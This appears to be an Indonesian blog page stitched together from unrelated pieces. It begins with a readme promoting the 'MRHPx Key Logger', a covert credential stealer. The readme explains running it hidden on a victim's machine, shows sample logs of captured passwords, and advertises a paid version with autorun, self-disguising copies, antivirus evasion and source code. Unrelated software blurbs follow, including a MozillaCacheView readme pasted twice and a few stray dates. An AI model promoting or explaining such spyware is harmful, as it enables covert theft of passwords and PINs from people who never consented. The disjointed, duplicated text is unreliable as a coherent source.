Pemilik Key Logger kemudian membaca data yang didapatkan tersebut dengan teliti dengan
harapan menemukan kata sandi (Password) atau mungkin informasi lain yang bermanfaat yang
bisa digunakan sebagai serangan Social Engineering. Key Logger secara sederhana bisa
dikategorikan sebagai Hack Tool Pencuri Informasi.
Sebagai contoh, Key Logger dapat mengungkapkan isi dari semua e-mail yang ditulis oleh korban.
Program Key Logger biasanya terdapat di dalam rootkit dan trojan.
------------------------------
| PERSYARATAN SOFTWARE MINIMAL |
------------------------------
OS MS Windows : - NT 3.51
- NT 4
- 2000
- XP
- 2003 Server
- 2008 Server
- Vista
- Seven
Dependencies : kernel32.dll ;)
File Size : 1) PUBLIC VERSION
10.5 KB (10,752 bytes)
BEFORE COMPRESSION
RESOURCE+ICON
2) PRIVATE VERSION
6.00 KB (6,144 bytes)
BEFORE COMPRESSION
NO RESOURCE+ICON
-----------------
| CARA PENGGUNAAN |
-----------------
1) Untuk menjalankan, klik ganda file dengan nama "MRHPx-Key-Logger.exe", sekali dijalankan
maka Key Logger tetap akan berjalan secara background sampai komputer target direstart
atau shutdown. Key Logger ini tidak memiliki User Interface sehingga tidak terlihat
pada "Tab Applications Task Manager".
2) LOG file yang berisi data korban bernama "MRHPx-KeyLogger-v1.8-PUBLICVERSION-Log.txt"
terletak pada direktori yang sama, dengan tempat Key Logger terpasang. LOG file ini akan
muncul secara otomatis saat Key Logger dijalankan.
3) Untuk menghentikan Key Logger tekan secara bersamaan tombol "CTRL+ALT+P" pada Keyboard
Anda.
CATATAN : Untuk pengguna PRIVATE VERSION harap membaca petunjuk yang disertakan.
Petunjuk penggunaan ini hanya berlaku untuk pengguna PUBLIC VERSION.
## PERBANDINGAN MRHPx Key Logger PUBLIC DAN PRIVATE VERSION ##
==============================================================
| FITUR | PUBLIC VERSION | PRIVATE VERSION |
==============================================================
| Autorun | Tidak | Ada |
-------------------------------------------------------------
| TradeMark | Ada | Tidak |
-------------------------------------------------------------
| Fake Virus Sign | Ada | Tidak |
-------------------------------------------------------------
| LOG file FIX | Tidak | Ada |
-------------------------------------------------------------
| File Run FIX | Tidak | Ada |
-------------------------------------------------------------
| Agreement Dialogue | Ada | Tidak |
--------------------------------------------------------------
| Anti Hack Tools | Ada | Tidak |
--------------------------------------------------------------
| Anti Hack Methods | Ada | Ada |
--------------------------------------------------------------
| Self Copying(*) | Tidak | Ada |
--------------------------------------------------------------
CATATAN: Tanda (*) Fitur AMBIGU Lihat penjelasan
------------------
| PENJELASAN FITUR |
------------------
Autorun.............: Mampu berjalan secara otomatis pada saat OS Windows dinyalakan.
Key Logger akan tetap berjalan secara background di komputer korban
setiap waktu secara otomatis tanpa merepotkan Anda. HANYA TERDAPAT
PADA PRIVATE VERSION.
TradeMark...........: Tanda pengenal identitas Key Logger, pada registry dan string PE
serta pada LOG file (nama dan header).
Tanda ini akan membuat Key Logger mudah terdeteksi (tertangkap) oleh
user (korban), antivirus (bahkan mampu terendus oleh antivirus paling
jelek sekalipun yang hanya bermodalkan EP dan string scanner!!!)
TIDAK TERDAPAT PADA PRIVATE VERSION.
Fake Virus Sign.....: Tanda pengenal false alarm virus. Signature pada algoritma PE.
Tanda ini akan membuat Key Logger dianggap sebagai virus (meskipun
sebenarnya tidak mengandung virus sama sekali) oleh beberapa
antivirus terkenal yang memiliki fitur heuristic dan sejenisnya untuk
menghapus file yang mencurigakan. HANYA TERDAPAT PADA PUBLIC VERSION.
Log file FIX........: LOG file yang menyimpan data kurang stabil pada PUBLIC VERSION.
Selain itu nama file dan konten mengandung TradeMark.
Contoh : Saat target mengetik dengan menggunakan Notepad maka pada LOG
file akan tertulis header yang menerangkan aplikasi yang dipergunakan
oleh target untuk mengetik. Hal ini menghindari penumpukan karakter serta
lebih memudahkan user mengetahui aplikasi apa yang dipergunakan target
untuk mengetik password, PIN Bank, dll. HANYA TERDAPAT PADA PRIVATE VERSION.
---------------------------------------------------------------------
|Contoh Tampilan LOG pada PRIVATE VERSION |
---------------------------------------------------------------------
| ### Rekaman Karakter dari :Naskah Ujian.txt - Notepad ### |
| Kunci jawaban soal. |
| 1. A |
| 2. C |
| 3. E |
| |
| ### Rekaman Karakter dari :Mozilla Firefox ### |
| www.wordpress.com |
| |
| ### Rekaman Karakter dari :MRHPx › Log In - Mozilla Firefox ### |
| usertest[Tab]passwordtest |
---------------------------------------------------------------------
|Contoh Tampilan LOG pada PRIVATE VERSION |
---------------------------------------------------------------------
| ### Rekaman Karakter dari :Naskah Ujian.txt - Notepad ### |
| Kunci jawaban soal. |
| 1. A |
| 2. C |
| 3. E |
| |
| ### Rekaman Karakter dari :Mozilla Firefox ### |
| www.wordpress.com |
| |
| ### Rekaman Karakter dari :MRHPx › Log In - Mozilla Firefox ### |
| usertest[Tab]passwordtest |
---------------------------------------------------------------------
File Run FIX........: File yang dijalankan tidak dibatasi pada PUBLIC VERSION. Hal ini
tidak efektif terhadap memori, bisa menimbulkan kecurigaan korban
serta membuat sistem tidak stabil.
Agreement Dialogue..: Dialog pernyataan dan persetujuan software. Pada PUBLIC VERSION dialog
ini akan muncul setiap kali Key Logger dijalankan. Sehingga jika terjadi
penyalahgunaan. Contoh : menyalahgunakan Key Logger dengan menginstal
pada sistem milik orang lain, maka user yang menjadi target dengan mudah
akan mengetahuinya.
Anti Hack Tools.....: Meminimalisir penetrasi yang dilakukan beberapa tool reversing secara
umum. Jika di sistem target terdapat tool yang mencurigakan, Key Logger
akan berhenti bekerja secara otomatis. TIDAK TERDAPAT PADA PRIVATE VERSION.
Anti Hack Methods...: Meminimalisir tracing instruksi yang terdapat pada Key Logger. Mencegah
melakukan pencurian kode pada program yang Saya buat.
Self Copying........: Mempunyai kemampuan penyalinan diri dan merubah nama menjadi file yang
tidak dicurigai. Saat dijalankan Key Logger akan menyalin dirinya dan
menyamar menjadi tool Windows. HANYA TERDAPAT PADA PRIVATE VERSION.
(*)CATATAN: beberapa Antivirus, Anti-Trojan, Anti-Malware mendeteksi fitur ini
berdasarkan algoritma penyalinan dan keberadaan file tidak dikenal pada OS,
fitur ini sering digunakan oleh para elit coder untuk mempersenjatai rootkit
mereka. Jadi kemungkinan besar fitur ini akan dinonaktifkan untuk sementara
waktu hingga Saya menemukan algoritma dan trik yang lebih baik.
----------------------
| ALASAN DAN KRONOLOGI |
----------------------
SOFTWARE INI DIDESAIN HANYA UNTUK TUJUAN PEMBELAJARAN SAJA DAN BUKAN UNTUK TUJUAN KEJAHATAN!!!
Saya sengaja membuat 2 versi Key Logger untuk menghindari LOST-kontrol serta penyalahgunaan.
Pada PUBLIC VERSION kelemahan (BUGS) sengaja ditambahkan karena versi tersebut di download
dan dipergunakan oleh orang banyak yang tidak pernah Saya kenal sebelumnya. Saya tidak ingin
terjadi penyalahgunaan atas software yang Saya buat. Selain itu dengan adanya pembatasan fitur
akan mengurangi resiko penyalahgunaan Key Logger dalam tindakan kejahatan. MRHPx Key Logger
PUBLIC VERSION tersedia secara gratis dan bisa Anda peroleh dari website pribadi Saya.
Pada PRIVATE VERSION beberapa kelemahan (BUGS) ditiadakan karena ditujukan untuk user yang serius
dan benar-benar memiliki kepedulian tentang keamanan komputer yang masing-masing harus teregister
dan bisa bertanggungjawab atas apa yang akan dilakukan. Setiap salinan PRIVATE VERSION antara satu
dan lainnya memiliki algoritma berbeda untuk menghindari deteksi.
MRHPx Key Logger v1.8 PRIVATE VERSION yang lebih DAHSYAT dan TANPA BATASAN FITUR adalah software
donasi (amal), tersedia dalam 2 paket terpisah :
1) Paket binary lengkap, donasi sebesar Rp. 100.000
2) Paket binary dan source code lengkap, donasi sebesar Rp. 300.000
Hasil yang terkumpul dari donasi akan diberikan kepada yatim piatu, panti asuhan, fakir miskin dan
saudara-saudara kita yang membutuhkan. Saya berbagi ilmu kepada Anda dan Anda berbagi rejeki kepada
saudara-saudara kita diluar sana yang membutuhkan bantuan dan kepedulian kita. Semoga Tuhan memberikan
berkah atas amal kita. Untuk tata cara donasi Anda bisa menghubungi Saya melalui email facebook ataupun
yahoo.
Semoga dengan cara seperti ini semua orang akan lebih bersemangat dan tertarik untuk membantu dan peduli
terhadap sesama. Karena bisa mendapatkan keuntungan ilmu secara langsung disamping berbuat baik kepada
orang lain. Bukankah hal ini lebih bermanfaat dan lebih terjangkau daripada membeli shareware dari
internet yang harganya diatas 300ribu (US$ 30) dan tidak memberikan tambahan ilmu? :) Mohon bantuan
do'anya untuk kesuksesan donasi ini.
"Knowledge is Ability, Knowledge mean Glory, Knowledge for Charity"
---------
| CONTACT |
---------
Email : mrhpx@yahoo.com
Facebook : www.facebook.com/mrhpx
Website : www.mrhpx.co.nr
Mirror : www.mrhpx.astalavista.ms
To companies, Bussines person or Computer security bussines in Indonesia who need My skill or looking
for a man with unique knowledge like Me. You are welcome to hire Me. Just contact Me. This year I plan
to move from My old job company. I was bored because they don't give Me a freedom feeling to work, just
wasted My time a lot. Thanx.
----------------------------
| PERJANJIAN DAN PERSETUJUAN |
----------------------------
Dengan menggunakan software ini Anda otomatis menyetujui menggunakan software ini untuk tujuan LEGAL
dan bukan ILLEGAL. Anda terikat pada disclaimer dan terms di "MRHPx.diz" dan website MRHPx aka Rizal
di "http://www.mrhpx.co.nr" dan lainnya.
Semua resiko dan tanggungjawab penggunaan software ini adalah milik Anda. MRHPx aka Rizal tidak
bertanggungjawab terhadap kerusakan, penyalahgunaan, kerugian apapun pada orang dan properti milik Anda
karena memasang dan menggunakan MRHPx Key Logger.
PERHATIAN : software ini adalah 100% rootkit INFO STEALER yang mempunyai kemampuan untuk menyimpan data
(contoh : Password, PIN banking, Email, etc) dari masukan keyboard dan bekerja secara background.
Tidak menginfeksi, menghapus, merubah, membagi, merusak data ataupun mengirimkan data dalam bentuk apapun
dari dan ke luar dari sistem Anda ke pihak lain mencakup publik ataupun pembuat software.
Pergunakan software ini hanya untuk pengujian terhadap keamanan sistem, komputer dan jaringan resmi milik
anda, bukan milik orang lain.
--------------------------------
| Greetz but NO CREDITS fly to : |
--------------------------------
My Family.. My Love.. My Cats.. My God and Prophet.. Astalavista.. 0Day.. All friends who help Me a lot until
this day in IRiS, LUCiFER, BlackStorm, Kocok Jaya, BinusHacker, iRC, uCF, dT, AGAiN, AiR, LZ0, FOSi, ASSiGN,
DVT, 29A, TSRh, tPORT, FFF.. All Indonesia veteran haxx0r.. Underground communities.. Rekan-rekan semasa kuliah
di Univ. Islam Malang, Univ. Brawijaya Malang, Univ. Muhammadiyah Malang.. Rekan-rekan kerja di PT. Malindo
Feedmill, PT. Panca Patriot Prima, PT. Wonokoyo Joyo Corporindo, PT. Cheil Jedang Samsung Group, PT. Charoen
Pokphand Indonesia dan My Family Bussines Company (Mama.. Saya bisa, Saya berusaha, Saya tak akan pernah lelah.)
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
| PUBLIC MESSAGES: STOP ISLAM PHOBIA! |
| STOP CRIME AGAINST HUMANITY! |
| STOP CRIME AGAINST RELIGION! |
| STOP ALL TERRORIST ACTIVITIES! |
| ISLAM IS LOVE, PEACE, EMPHATY! |
| INDONESIA IS THE BEST COUNTRY EVER! |
| PASURUAN IS THE BEST TOURISM EVER! |
| MALANG IS THE BEST JOURNEY EVER! |
| VISIT INDONESIA HACK YEAR 2o11-2o12 |
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
from : http://www.binushacker.net/key-logger-tool-pencuri-informasi.html
Selasa, 24 Mei 2011
Sabtu, 21 Mei 2011
Jumat, 20 Mei 2011
Sabtu, 14 Mei 2011
Download Accelerator Plus 8.6.1.4
Jumat, 06 Mei 2011
putty-0.60-installer - client program
putty-0.60-installer
PuTTY is a client program for the SSH, Telnet and Rlogin network protocols.
These protocols are all used to run a remote session on a computer, over a network. PuTTY implements the client end of that session: the end at which the session is displayed, rather than the end at which it runs.
In really simple terms: you run PuTTY on a Windows machine, and tell it to connect to (for example) a Unix machine. PuTTY opens a window. Then, anything you type into that window is sent straight to the Unix machine, and everything the Unix machine sends back is displayed in the window. So you can work on the Unix machine as if you were sitting at its console, while actually sitting somewhere else.
This download includes the following tools:
PuTTY (the Telnet and SSH client itself)
PSCP (an SCP client, i.e. command-line secure file copy)
PSFTP (an SFTP client, i.e. general file transfer sessions much like FTP)
PuTTYtel (a Telnet-only client)
Plink (a command-line interface to the PuTTY back ends)
Pageant (an SSH authentication agent for PuTTY, PSCP and Plink)
PuTTYgen (an RSA and DSA key generation utility).
Rabu, 04 Mei 2011
Mozilla Cache View - Basic View Data
Download
MozillaCacheView v1.37
Copyright (c) 2007 - 2011 Nir Sofer
Web site: http://www.nirsoft.net
Description
===========
MozillaCacheView is a small utility that reads the cache folder of
Firefox/Mozilla/Netscape Web browsers, and displays the list of all files
currently stored in the cache. For each cache file, the following
information is displayed: URL, Content type, File size, Last modified
time, Last fetched time, Expiration time, Fetch count, Server name, and
more.
You can easily select one or more items from the cache list, and then
extract the files to another folder, or copy the URLs list to the
clipboard.
System Requirements
===================
This utility works on any version of Windows, From Windows 98 to Windows
7. You can use this utility even if Firefox/Mozilla is not installed on
your system, as long as you have the entire cache folder that you want to
inspect.
Versions History
================
* Version 1.37:
o The status bar now displays the total size of selected files in
KB/MB. (Only existing files are accumulated)
* Version 1.36:
o Fixed to work properly with the cache of Firefox 4 (Beta).
* Version 1.35:
o Added 'Open Selected Cache File' option. When you use this
option, the selected file is extracted into a temporary folder, and
then it's open with the default file viewer. The temporary
file/folders are automatically deleted when you close
MozillaCacheView.
* Version 1.31:
o Added 'Add Header Line To CSV/Tab-Delimited File' option. When
this option is turned on, the column names are added as the first
line when you export to csv or tab-delimited file.
* Version 1.30:
o Fixed bug: /copycache failed to copy cache files stored inside
_CACHE_001_, _CACHE_002_, and _CACHE_003_ files.
o Fixed bug: For some Web sites (like Google Books), the 'Content
Type' column displayed wrong value.
* Version 1.27:
o Fixed bug: MozillaCacheView failed to copy cache files because
the filenames contained invalid file characters (?, :, *, |, and
others).
* Version 1.26:
o Add /sort option for sorting the cache list that you save from
command-line.
* Version 1.25:
o Added support for saving cache files from command-line.
* Version 1.21:
o Added new option in 'Copy Selected Cache Files': Update the
modified time of the copied files according to modified time in the
Web server.
* Version 1.20:
o Added support for cache filter. (Display only URLs which contain
the specified filter strings)
* Version 1.17:
o Fixed bug: in some cases, MozillaCacheView crashed when loading
the cache.
* Version 1.16:
o Added 'Hide Missing Cache Files' option.
o Fixed bug: In some systems, MozillaCacheView didn't display all
cache files.
* Version 1.15:
o New option in 'Copy Selected Cache Files To...': Save the files
in the directory structure of the Web site.
* Version 1.12:
o Added AutoComplete to the cache folders combo-box
* Version 1.11:
o Added 'Cache Control' and 'ETag' columns.
* Version 1.10:
o New option: Remember the selected cache folder.
* Version 1.09:
o The dialog-boxes are now resizable.
* Version 1.08:
o The URLs in HTML report are now created as links.
* Version 1.07:
o Added AutoComplete to 'Copy Selected Files To'.
o Fixed bug: The main window lost the focus when the user switched
to another application and then returned back to MozillaCacheView.
* Version 1.06:
o Added support for saving as comma-delimited text file.
* Version 1.05:
o New column: Cache Name.
o New column: Missing File.
o New option: Mark Missing Cache Files.
o Added new option:'Copy as new name if filename already exists'.
o Added new option: 'Delete Selected Cache Files' (Works only for
items that have a cache name).
* Version 1.02:
o Fixed the text-length limit problem in the cache folder combo-box.
* Version 1.01:
o Added filter by file type (application, image, text/html, video,
and audio)
o New Option: Show Zero-Lenth Files
o New Option: Show Files With Error Server Response.
* Version 1.00 - First release.
The Location Of Mozilla Cache Folder
====================================
The cache folder of Mozilla Firefox is located under C:\Documents and
Settings\[User Name]\Local Settings\Application
Data\Mozilla\Firefox\Profiles\[Profile Name]\Cache
The cache folder of SeaMonkey is located under C:\Documents and
Settings\[User Name]\Local Settings\Application
Data\Mozilla\Profiles\[Profile Name]\Cache
For other variants of Mozilla, you may find the cache folder under
C:\Documents and Settings\[User Name]\Application
Data\Mozilla\Profiles\[Profile Name]\Cache
Using MozillaCacheView
======================
MozillaCacheView doesn't require any installation process or additional
DLL files. Just copy the executable file (MozillaCacheView.exe) to any
folder you like, and run it.
After you run it, the main window displays the list of files currently
stored in the cache of the Mozilla/Firefox profile that you used in the
last time. If you want to view the cache of another profile, simply use
the 'Select Cache Folder' option (F9), and choose the desired cache
folder.
You can select one or more cache files from the list, and than export the
list into text/html/xml file ('Save Selected Items' option), copy the URL
list to the clipboard (Ctrl+U), copy the entire table of cache files
(Ctrl+C), and then paste it to Excel or to OpenOffice spreadsheet. You
can also extract the actual files from the cache, and save them into
another folder, You can do that by using the 'Copy Selected Cache Files
To' option (F4).
Notice...
=========
In order to watch the latest cache files, you must close all Windows of
Firefox, because only when you do that, Firefox saves the cache index
files into the disk.
Notice For Delete Option
========================
When you delete files from the cache, MozillaCacheView delete the cache
files, but it doesn't delete the reference to them in the cache index
file. This means that even after you delete files from the cache, you'll
still see them in the list, but the 'Missing File' column will be turned
from 'No' to 'Yes'.
Command-Line Options
====================
/stext <Filename>
Save the list of all cache files into a regular text file.
/stab <Filename>
Save the list of all cache files into a tab-delimited text file.
/scomma <Filename>
Save the list of all cache files into a comma-delimited text file.
/stabular <Filename>
Save the list of all cache files into a tabular text file.
/shtml <Filename>
Save the list of all cache files into HTML file (Horizontal).
/sverhtml <Filename>
Save the list of all cache files into HTML file (Vertical).
/sxml <Filename>
Save the list of all cache files to XML file.
/sort <column>
This command-line option can be used with other save options for sorting
by the desired column. If you don't specify this option, the list is
sorted according to the last sort that you made from the user interface.
The <column> parameter can specify the column index (0 for the first
column, 1 for the second column, and so on) or the name of the column,
like "Content Type" and "Filename". You can specify the '~' prefix
character (e.g: "~URL") if you want to sort in descending order. You can
put multiple /sort in the command-line if you want to sort by multiple
columns.
Examples:
MozillaCacheView.exe /shtml "f:\temp\1.html" /sort 2 /sort ~1
MozillaCacheView.exe /shtml "f:\temp\1.html" /sort "~Content Type" /sort
"File Size"
/nosort
When you specify this command-line option, the list will be saved without
any sorting.
-folder <Cache Folder>
Start MozillaCacheView with the specified cache folder.
/copycache <URL> <Content Type>
Copy files from the cache into the folder specified in /CopyFilesFolder
parameter. In the <URL> parameter, you can specify the URL of the Web
site (for example: http://www.nirsoft.net) or empty string ("") if you
want to copy files from all Web sites. In the <Content Type> parameter,
you can specify full content type (like image/png), partial content type
(like 'image') or empry string ("") if you want to copy all types of
files.
/CopyFilesFolder <Folder>
Specifies the folder to copy the cache files.
/UseWebSiteDirStructure 0 | 1
Save the files in the directory structure of the Web site. 0 = No, 1 = Yes
/UpdateModifiedTime 0 | 1
Update the modified time of the copied files according to modified time
in the Web server. 0 = No, 1 = Yes
/NewNameIfExist 0 | 1
Copy as new name if filename already exists. 0 = No, 1 = Yes
Examples:
MozillaCacheView.exe -folder "C:\Documents and
Settings\Administrator\Local Settings\Application
Data\Mozilla\Firefox\Profiles\acf2c3u2.default\Cache"
MozillaCacheView.exe -folder "C:\Documents and
Settings\Administrator\Local Settings\Application
Data\Mozilla\Firefox\Profiles\acf2c3u2.default\Cache" /shtml
c:\temp\mz.html
MozillaCacheView.exe /stext c:\temp\mz.txt
Copy Cache Examples:
* Copy all cache files of www.nirsoft.net to f:\temp in the directory
structure of the Web site:
/copycache "http://www.nirsoft.net" "" /CopyFilesFolder "f:\temp"
/UseWebSiteDirStructure 1
* Copy all image cache files of www.nirsoft.net to f:\temp:
/copycache "http://www.nirsoft.net" "image" /CopyFilesFolder "f:\temp"
/UseWebSiteDirStructure 0
* Copy all .png files from the cache to f:\temp:
/copycache "" "image/png" /CopyFilesFolder "f:\temp"
/UseWebSiteDirStructure 0
* Copy all files from the cache to f:\temp:
/copycache "" "" /CopyFilesFolder "f:\temp" /UseWebSiteDirStructure 0
Translating MozillaCacheView to other languages
===============================================
In order to translate MozillaCacheView to other language, follow the
instructions below:
1. Run MozillaCacheView with /savelangfile parameter:
MozillaCacheView.exe /savelangfile
A file named MozillaCacheView_lng.ini will be created in the folder of
MozillaCacheView utility.
2. Open the created language file in Notepad or in any other text
editor.
3. Translate all string entries to the desired language. Optionally,
you can also add your name and/or a link to your Web site.
(TranslatorName and TranslatorURL values) If you add this information,
it'll be used in the 'About' window.
4. After you finish the translation, Run MozillaCacheView, and all
translated strings will be loaded from the language file.
If you want to run MozillaCacheView without the translation, simply
rename the language file, or move it to another folder.
License
=======
This utility is released as freeware. You are allowed to freely
distribute this utility via floppy disk, CD-ROM, Internet, or in any
other way, as long as you don't charge anything for this. If you
distribute this utility, you must include all files in the distribution
package, without any modification !
Disclaimer
==========
The software is provided "AS IS" without any warranty, either expressed
or implied, including, but not limited to, the implied warranties of
merchantability and fitness for a particular purpose. The author will not
be liable for any special, incidental, consequential or indirect damages
due to loss of data or any other reason.
Feedback
========
If you have any problem, suggestion, comment, or you found a bug in my
utility, you can send a message to nirsofer@yahoo.com
MozillaCacheView v1.37
Copyright (c) 2007 - 2011 Nir Sofer
Web site: http://www.nirsoft.net
Description
===========
MozillaCacheView is a small utility that reads the cache folder of
Firefox/Mozilla/Netscape Web browsers, and displays the list of all files
currently stored in the cache. For each cache file, the following
information is displayed: URL, Content type, File size, Last modified
time, Last fetched time, Expiration time, Fetch count, Server name, and
more.
You can easily select one or more items from the cache list, and then
extract the files to another folder, or copy the URLs list to the
clipboard.
System Requirements
===================
This utility works on any version of Windows, From Windows 98 to Windows
7. You can use this utility even if Firefox/Mozilla is not installed on
your system, as long as you have the entire cache folder that you want to
inspect.
Versions History
================
* Version 1.37:
o The status bar now displays the total size of selected files in
KB/MB. (Only existing files are accumulated)
* Version 1.36:
o Fixed to work properly with the cache of Firefox 4 (Beta).
* Version 1.35:
o Added 'Open Selected Cache File' option. When you use this
option, the selected file is extracted into a temporary folder, and
then it's open with the default file viewer. The temporary
file/folders are automatically deleted when you close
MozillaCacheView.
* Version 1.31:
o Added 'Add Header Line To CSV/Tab-Delimited File' option. When
this option is turned on, the column names are added as the first
line when you export to csv or tab-delimited file.
* Version 1.30:
o Fixed bug: /copycache failed to copy cache files stored inside
_CACHE_001_, _CACHE_002_, and _CACHE_003_ files.
o Fixed bug: For some Web sites (like Google Books), the 'Content
Type' column displayed wrong value.
* Version 1.27:
o Fixed bug: MozillaCacheView failed to copy cache files because
the filenames contained invalid file characters (?, :, *, |, and
others).
* Version 1.26:
o Add /sort option for sorting the cache list that you save from
command-line.
* Version 1.25:
o Added support for saving cache files from command-line.
* Version 1.21:
o Added new option in 'Copy Selected Cache Files': Update the
modified time of the copied files according to modified time in the
Web server.
* Version 1.20:
o Added support for cache filter. (Display only URLs which contain
the specified filter strings)
* Version 1.17:
o Fixed bug: in some cases, MozillaCacheView crashed when loading
the cache.
* Version 1.16:
o Added 'Hide Missing Cache Files' option.
o Fixed bug: In some systems, MozillaCacheView didn't display all
cache files.
* Version 1.15:
o New option in 'Copy Selected Cache Files To...': Save the files
in the directory structure of the Web site.
* Version 1.12:
o Added AutoComplete to the cache folders combo-box
* Version 1.11:
o Added 'Cache Control' and 'ETag' columns.
* Version 1.10:
o New option: Remember the selected cache folder.
* Version 1.09:
o The dialog-boxes are now resizable.
* Version 1.08:
o The URLs in HTML report are now created as links.
* Version 1.07:
o Added AutoComplete to 'Copy Selected Files To'.
o Fixed bug: The main window lost the focus when the user switched
to another application and then returned back to MozillaCacheView.
* Version 1.06:
o Added support for saving as comma-delimited text file.
* Version 1.05:
o New column: Cache Name.
o New column: Missing File.
o New option: Mark Missing Cache Files.
o Added new option:'Copy as new name if filename already exists'.
o Added new option: 'Delete Selected Cache Files' (Works only for
items that have a cache name).
* Version 1.02:
o Fixed the text-length limit problem in the cache folder combo-box.
* Version 1.01:
o Added filter by file type (application, image, text/html, video,
and audio)
o New Option: Show Zero-Lenth Files
o New Option: Show Files With Error Server Response.
* Version 1.00 - First release.
The Location Of Mozilla Cache Folder
====================================
The cache folder of Mozilla Firefox is located under C:\Documents and
Settings\[User Name]\Local Settings\Application
Data\Mozilla\Firefox\Profiles\[Profile Name]\Cache
The cache folder of SeaMonkey is located under C:\Documents and
Settings\[User Name]\Local Settings\Application
Data\Mozilla\Profiles\[Profile Name]\Cache
For other variants of Mozilla, you may find the cache folder under
C:\Documents and Settings\[User Name]\Application
Data\Mozilla\Profiles\[Profile Name]\Cache
Using MozillaCacheView
======================
MozillaCacheView doesn't require any installation process or additional
DLL files. Just copy the executable file (MozillaCacheView.exe) to any
folder you like, and run it.
After you run it, the main window displays the list of files currently
stored in the cache of the Mozilla/Firefox profile that you used in the
last time. If you want to view the cache of another profile, simply use
the 'Select Cache Folder' option (F9), and choose the desired cache
folder.
You can select one or more cache files from the list, and than export the
list into text/html/xml file ('Save Selected Items' option), copy the URL
list to the clipboard (Ctrl+U), copy the entire table of cache files
(Ctrl+C), and then paste it to Excel or to OpenOffice spreadsheet. You
can also extract the actual files from the cache, and save them into
another folder, You can do that by using the 'Copy Selected Cache Files
To' option (F4).
Notice...
=========
In order to watch the latest cache files, you must close all Windows of
Firefox, because only when you do that, Firefox saves the cache index
files into the disk.
Notice For Delete Option
========================
When you delete files from the cache, MozillaCacheView delete the cache
files, but it doesn't delete the reference to them in the cache index
file. This means that even after you delete files from the cache, you'll
still see them in the list, but the 'Missing File' column will be turned
from 'No' to 'Yes'.
Command-Line Options
====================
/stext <Filename>
Save the list of all cache files into a regular text file.
/stab <Filename>
Save the list of all cache files into a tab-delimited text file.
/scomma <Filename>
Save the list of all cache files into a comma-delimited text file.
/stabular <Filename>
Save the list of all cache files into a tabular text file.
/shtml <Filename>
Save the list of all cache files into HTML file (Horizontal).
/sverhtml <Filename>
Save the list of all cache files into HTML file (Vertical).
/sxml <Filename>
Save the list of all cache files to XML file.
/sort <column>
This command-line option can be used with other save options for sorting
by the desired column. If you don't specify this option, the list is
sorted according to the last sort that you made from the user interface.
The <column> parameter can specify the column index (0 for the first
column, 1 for the second column, and so on) or the name of the column,
like "Content Type" and "Filename". You can specify the '~' prefix
character (e.g: "~URL") if you want to sort in descending order. You can
put multiple /sort in the command-line if you want to sort by multiple
columns.
Examples:
MozillaCacheView.exe /shtml "f:\temp\1.html" /sort 2 /sort ~1
MozillaCacheView.exe /shtml "f:\temp\1.html" /sort "~Content Type" /sort
"File Size"
/nosort
When you specify this command-line option, the list will be saved without
any sorting.
-folder <Cache Folder>
Start MozillaCacheView with the specified cache folder.
/copycache <URL> <Content Type>
Copy files from the cache into the folder specified in /CopyFilesFolder
parameter. In the <URL> parameter, you can specify the URL of the Web
site (for example: http://www.nirsoft.net) or empty string ("") if you
want to copy files from all Web sites. In the <Content Type> parameter,
you can specify full content type (like image/png), partial content type
(like 'image') or empry string ("") if you want to copy all types of
files.
/CopyFilesFolder <Folder>
Specifies the folder to copy the cache files.
/UseWebSiteDirStructure 0 | 1
Save the files in the directory structure of the Web site. 0 = No, 1 = Yes
/UpdateModifiedTime 0 | 1
Update the modified time of the copied files according to modified time
in the Web server. 0 = No, 1 = Yes
/NewNameIfExist 0 | 1
Copy as new name if filename already exists. 0 = No, 1 = Yes
Examples:
MozillaCacheView.exe -folder "C:\Documents and
Settings\Administrator\Local Settings\Application
Data\Mozilla\Firefox\Profiles\acf2c3u2.default\Cache"
MozillaCacheView.exe -folder "C:\Documents and
Settings\Administrator\Local Settings\Application
Data\Mozilla\Firefox\Profiles\acf2c3u2.default\Cache" /shtml
c:\temp\mz.html
MozillaCacheView.exe /stext c:\temp\mz.txt
Copy Cache Examples:
* Copy all cache files of www.nirsoft.net to f:\temp in the directory
structure of the Web site:
/copycache "http://www.nirsoft.net" "" /CopyFilesFolder "f:\temp"
/UseWebSiteDirStructure 1
* Copy all image cache files of www.nirsoft.net to f:\temp:
/copycache "http://www.nirsoft.net" "image" /CopyFilesFolder "f:\temp"
/UseWebSiteDirStructure 0
* Copy all .png files from the cache to f:\temp:
/copycache "" "image/png" /CopyFilesFolder "f:\temp"
/UseWebSiteDirStructure 0
* Copy all files from the cache to f:\temp:
/copycache "" "" /CopyFilesFolder "f:\temp" /UseWebSiteDirStructure 0
Translating MozillaCacheView to other languages
===============================================
In order to translate MozillaCacheView to other language, follow the
instructions below:
1. Run MozillaCacheView with /savelangfile parameter:
MozillaCacheView.exe /savelangfile
A file named MozillaCacheView_lng.ini will be created in the folder of
MozillaCacheView utility.
2. Open the created language file in Notepad or in any other text
editor.
3. Translate all string entries to the desired language. Optionally,
you can also add your name and/or a link to your Web site.
(TranslatorName and TranslatorURL values) If you add this information,
it'll be used in the 'About' window.
4. After you finish the translation, Run MozillaCacheView, and all
translated strings will be loaded from the language file.
If you want to run MozillaCacheView without the translation, simply
rename the language file, or move it to another folder.
License
=======
This utility is released as freeware. You are allowed to freely
distribute this utility via floppy disk, CD-ROM, Internet, or in any
other way, as long as you don't charge anything for this. If you
distribute this utility, you must include all files in the distribution
package, without any modification !
Disclaimer
==========
The software is provided "AS IS" without any warranty, either expressed
or implied, including, but not limited to, the implied warranties of
merchantability and fitness for a particular purpose. The author will not
be liable for any special, incidental, consequential or indirect damages
due to loss of data or any other reason.
Feedback
========
If you have any problem, suggestion, comment, or you found a bug in my
utility, you can send a message to nirsofer@yahoo.com
Selasa, 03 Mei 2011
Minggu, 01 Mei 2011
DAEMON Tools Free - Media devices virtualization
Media devices virtualization
- Create up to 4 virtual devices to mount several images simultaneously
- Customize virtual drives: change a drive letter, DVD region, etc
- Mount *.mdx, *.mds/*.mdf, *.iso, *.b5t, *.b6t, *.bwt, *.ccd, *.cdi, *.cue, *.nrg, *.pdi, *.isz disc images to a virtual drive
Basic backing up functionality
- Make .iso, *.mds/*.mdf and *.mdx images of CD/DVD/Blu-ray discs
- Protect images with password
- Compress your images
- Manage your Image Collection
Simple user interface with basic system integration
- Get quick access to all functionalities via program icon in the System Tray
